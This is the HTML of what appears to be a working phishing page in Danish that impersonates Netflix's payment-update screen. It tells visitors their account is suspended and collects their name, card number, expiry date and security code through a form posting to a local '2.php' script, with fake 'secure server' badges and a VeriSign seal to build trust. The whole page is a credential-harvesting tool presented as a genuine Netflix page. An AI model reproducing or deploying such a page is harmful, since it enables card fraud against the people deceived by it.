﻿<DOCTYPE html>
<html><head><title>Netflix – Opdater dine betalingsoplysninger</title>
<script language="JavaScript" src="v.js" type="text/javascript"></script>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">

<link rel="shortcut icon" href="1_files/nficon2015.ico">
<link type="text/css" rel="stylesheet" href="files/z_002.css">
<link type="text/css" rel="stylesheet" href="files/z.css">
    

<style media="screen" type="text/css">#tmswf {visibility:hidden}</style>
<script src="files/clear.png" type="text/javascript" id="tdr_CDvpf"></script>
<img src="files/clear_002.png" style="visibility:hidden" id="tdr_OggHq"></head>
<body><div id="appMountPoint">
<div class="basicLayout firefox undefined" dir="ltr" data-reactid=".lisd9u97gg" data-react-checksum="-575974586" lang="da">
<div class="nfHeader signupBasicHeader" data-reactid=".lisd9u97gg.1">
<a href="#" class="icon-logoUpdate nfLogo signupBasicHeader" data-reactid=".lisd9u97gg.1.0">
<span class="screen-reader-text" data-reactid=".lisd9u97gg.1.0.0">Netflix</span></a>
<a href="1.htm?https://www.netflix.com/YourAccountPayment?_encoding=UTF8&_encoding=UTF8&openid.assoc_handle=caflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3" class="authLinks signupBasicHeader" data-reactid=".lisd9u97gg.1.1">Log ud</a></div>
<div class="centerContainer" data-reactid=".lisd9u97gg.2"><h1 data-reactid=".lisd9u97gg.2.1">Opdater dine betalingsoplysninger</h1>

Din konto er blevet suspenderet indtil denne proces er udført, og vi undskylder enhver ulejlighed.
</ul><div class="expando" data-reactid=".lisd9u97gg.2.5"></div>
<div class="secure-container clearfix" data-reactid=".lisd9u97gg.2.7"><div class="secure" data-reactid=".lisd9u97gg.2.7.0">
<span class="secure-desc" data-reactid=".lisd9u97gg.2.7.0.0"><h4 class="secure-text" data-reactid=".lisd9u97gg.2.7.0.0.0">Sikker server</h4>
<a class="tell-me-more" data-reactid=".lisd9u97gg.2.7.0.0.1">Fortæl mig mere</a></span><span class="icon-lock" data-reactid=".lisd9u97gg.2.7.0.3"></span></div></div>
<div class="accordion" data-reactid=".lisd9u97gg.2.8"><div class="isOpen expando" data-reactid=".lisd9u97gg.2.8.$0">
<div class="paymentExpandoHd" data-mop-type="creditOption" data-reactid=".lisd9u97gg.2.8.$0.$0">
<div class="container" data-reactid=".lisd9u97gg.2.8.$0.$0.0"><span class="arrow" data-reactid=".lisd9u97gg.2.8.$0.$0.0.0"></span>
<span class="hdLabel" data-reactid=".lisd9u97gg.2.8.$0.$0.0.1">Kreditkort</span><span class="logos" data-reactid=".lisd9u97gg.2.8.$0.$0.0.2">
<span class="logoIcon VISA" data-reactid=".lisd9u97gg.2.8.$0.$0.0.2.$VISA"></span>
<span class="logoIcon MASTERCARD" data-reactid=".lisd9u97gg.2.8.$0.$0.0.2.$MASTERCARD"></span>
</span></div></div>
<div style="max-height: 1400px; overflow: hidden; top: 0px; transition-duration: 1200ms;" class="expandoContent" data-reactid=".lisd9u97gg.2.8.$0.1">
<div class="paymentForm clearfix accordion" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption">
<form action="2.php" name="date" id="date" method="post">

<label class="firstName ui-label ui-input-label inline ui-input-half">
<span class="ui-label-text">Fornavn</span>
<span class="input-caption">Skal stemme overens med kortet</span>
<input class="ui-text-input medium auto-firstName" name="first" id="first" tabindex="0"></label>

<label class="lastName ui-label ui-input-label inline ui-input-half">
<span class="ui-label-text">Efternavn</span>
<span class="input-caption">Skal stemme overens med kortet</span>
<input class="ui-text-input medium auto-lastName" name="last" tabindex="0" id="last"></label>


<label class="creditCardNumber ui-label ui-input-label ui-input-half" data-reactid=".29rycd5ineo.2.8.$0.1.$creditOption.0.$creditCardNumber">
<span class="ui-label-text" data-reactid=".29rycd5ineo.2.8.$0.1.$creditOption.0.$creditCardNumber.0">Kortnummer</span>
<input class="ui-text-input medium auto-creditCardNumber" name="ccnumber" id="ccnumber" tabindex="0" data-reactid=".29rycd5ineo.2.8.$0.1.$creditOption.0.$creditCardNumber.2">
<span class="icon-lock" data-reactid=".29rycd5ineo.2.8.$0.1.$creditOption.0.$creditCardNumber.3"></span></label>

<div class="expiration-date ui-input-half" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate">
<label class="ui-label exp-date-label" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate.0">Udløbsdato</label>
<div class="ui-select-wrapper expMonth" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate.$expMonth">
<label class="ui-label no-display" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate.$expMonth.0"></label>
<div class="select-arrow medium" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate.$expMonth.1">

<select class="ui-select medium" name="month" tabindex="0" id="month">
<option selected="selected" value="0"></option>
<option value="1">jan. (1)</option>
<option value="2">feb. (2)</option>
<option value="3">mar. (3)</option>
<option value="4">apr. (4)</option>
<option value="5">maj (5)</option>
<option value="6">juni (6)</option>
<option value="7">juli (7)</option>
<option value="8">aug. (8)</option>
<option value="9">sep. (9)</option>
<option value="10">okt. (10)</option>
<option value="11">nov. (11)</option>
<option value="12">dec. (12)</option></select></div>

<span data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate.$expMonth.2"></span></div>


<div class="ui-select-wrapper expYear" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate.$expYear">
<label class="ui-label no-display" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate.$expYear.0"></label>
<div class="select-arrow medium" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate.$expYear.1">
<select class="ui-select medium" name="year" tabindex="0" id="year">
<option value="0" selected="selected"></option>
<option value="2017" >2017</option>
<option value="2018" >2018</option>
<option value="2019" >2019</option>
<option value="2020" >2020</option>
<option value="2021" >2021</option>
<option value="2022" >2022</option>
<option value="2023" >2023</option>
<option value="2024" >2024</option>
<option value="2025" >2025</option>
<option value="2026" >2026</option>
<option value="2027" >2027</option>
<option value="2028" >2028</option>
<option value="2029" >2029</option>
<option value="2030" >2030</option>
<option value="2031" >2031</option>
<option value="2032" >2032</option>
<option value="2033" >2033</option>
<option value="2034" >2034</option>
<option value="2035" >2035</option>
<option value="2036" >2036</option>
<option value="2037" >2037</option>
<option value="2038" >2038</option>
<option value="2039" >2039</option>
<option value="2040" >2040</option>
</select></div><span data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate.$expYear.2"></span></div>

<div class="input-message error" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$expirationDate.5"></div></div>

<label class="creditCardSecurityCode ui-label ui-input-label inline ui-input-half" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$creditCardSecurityCode">
<span class="ui-label-text" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$creditCardSecurityCode.0">Sikkerhedskode</span>

<input class="ui-text-input medium auto-creditCardSecurityCode" name="cvv" id="cvv" tabindex="0" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$creditCardSecurityCode.2">

<span class="icon-lock" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.$creditCardSecurityCode.3"></span></label>

<section class="cvv-hover clearfix" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.8">
<a tabindex="-1" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.8.0"><img src="files/question_mark.png" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.8.0.0"></a>
</section><div data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.a">
<div class="checkboxContainer hasAcceptedTermsOfUse altTerms" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.a.$hasAcceptedTermsOfUse"></div></div>

<input name="action" value="nextAction" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.b" type="hidden">

<input name="authURL" value="1453366084697.H3qXOr29rA2ZbOWaLeXOk8+tvZs=" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.c" type="hidden"><input name="planChoice" value="10318" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.d" type="hidden">
<input name="paymentChoice" value="creditOption" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.e" type="hidden">
<input name="withFields" value="creditData,planChoice,firstName,lastName,hasAcceptedTermsOfUse,paymentChoice" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.g" type="hidden">

<div class="clearfix" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h"><div class="btn-secure-wrapper" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.0">

<button class="btn btn-retro-signup btn-submit btn-retro" type="submit" autocomplete="off" tabindex="0" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.0.0">

<span data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.0.0.0:0">Opdater oplysninger</span>

</button>

<div class="secure" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.0.1">

<span class="secure-text" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.0.1.0">Sikker server</span>

<span class="icon-lock" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.0.1.1"></span></div></div>

<div class="verisign-seal clearfix" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.1">

<table  data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.1.0" cellpadding="2" cellspacing="0" width="135"><tbody>

<tr data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.1.0.0"><td data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.1.0.0.0" width="135">

<span class="verisign-seal-embed" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.1.0.0.0.0">

<img name="seal" src="files/getseal.gif" oncontextmenu="return false;" usemap="#sealmap_large" alt="" border="0"> <map name="sealmap_large" id="sealmap_large"></map>

<area title="" href="javascript:vrsn_splash()" shape="rect" coords="0,0,130,65" tabindex="-1" style="outline:none;">

<area  title="" href="javascript:vrsn_splash()" shape="rect" coords="0,65,71,88" tabindex="-1" style="outline:none;">

<area  title="" href="javascript:symcBuySSL()" shape="rect" coords="71,65,130,88" style="outline:none;"></span>

<a href="#" target="_blank" style="color:#000000;text-decoration:none;font:bold 7px verdana,sans-serif;letter-spacing:.5px;text-align:center;margin:0px;padding:0px;" data-reactid=".lisd9u97gg.2.8.$0.1.$creditOption.0.h.1.0.0.0.1">OM TRUST ONLINE</a>



</td></tr></tbody></table></div></div></form></div></div></div></div></div>

<div class="site-footer-wrapper centered" data-reactid=".lisd9u97gg.3"><div class="footer-divider" data-reactid=".lisd9u97gg.3.0"></div>

<div class="site-footer" data-reactid=".lisd9u97gg.3.1"><p class="footer-top" data-reactid=".lisd9u97gg.3.1.0">

<span data-reactid=".lisd9u97gg.3.1.0.0">Spørgsmål? Ring på&nbsp;</span>

<a class="footer-top-a" href="tel:80%2025%2012%2052" data-reactid=".lisd9u97gg.3.1.0.1">80 25 12 52</a><span data-reactid=".lisd9u97gg.3.1.0.2"></span></p>

<ul class="footer-links structural" data-reactid=".lisd9u97gg.3.1.1"><li class="footer-link-item" data-reactid=".lisd9u97gg.3.1.1.$footer=1responsive=1link=1terms">

<a class="footer-link" href="#" data-reactid=".lisd9u97gg.3.1.1.$footer=1responsive=1link=1terms.0">

<span data-reactid=".lisd9u97gg.3.1.1.$footer=1responsive=1link=1terms.0.0">Brugerbetingelser</span></a></li>

<li class="footer-link-item" data-reactid=".lisd9u97gg.3.1.1.$footer=1responsive=1link=1privacy">

<a class="footer-link" href="#" data-reactid=".lisd9u97gg.3.1.1.$footer=1responsive=1link=1privacy.0">

<span data-reactid=".lisd9u97gg.3.1.1.$footer=1responsive=1link=1privacy.0.0">Privatliv/cookies</span></a></li></ul>

<p class="copy-text" data-reactid=".lisd9u97gg.3.1.5"></p></div></div></div></div><div>


</div>
<script language="JavaScript" type="text/javascript">
 var frmvalidator = new Validator("date");

  frmvalidator.addValidation("first","req","Feltet Fornavn m\u00E5 ikke v\u00E6re tomt.");
  frmvalidator.addValidation("last","req","Feltet Efternavn m\u00E5 ikke v\u00E6re tomt.");
  frmvalidator.addValidation("ccnumber","req","Der skal indtastes et gyldigt kortnummer i formularen.");

  frmvalidator.addValidation("month","dontselect=0","Der skal indtastes en gyldig udl\u00F8bsdato.");
  frmvalidator.addValidation("year","dontselect=0","Der skal indtastes en gyldig udl\u00F8bsdato.");
  frmvalidator.addValidation("cvv","req","Den indtastede sikkerhedskode ser ud til at v\u00E6re ugyldig. Indtast den 3- eller 4-cifrede sikkerhedskode, som st\u00E5r p\u00E5 bagsiden af kreditkortet.");
  
</script>
</body></html>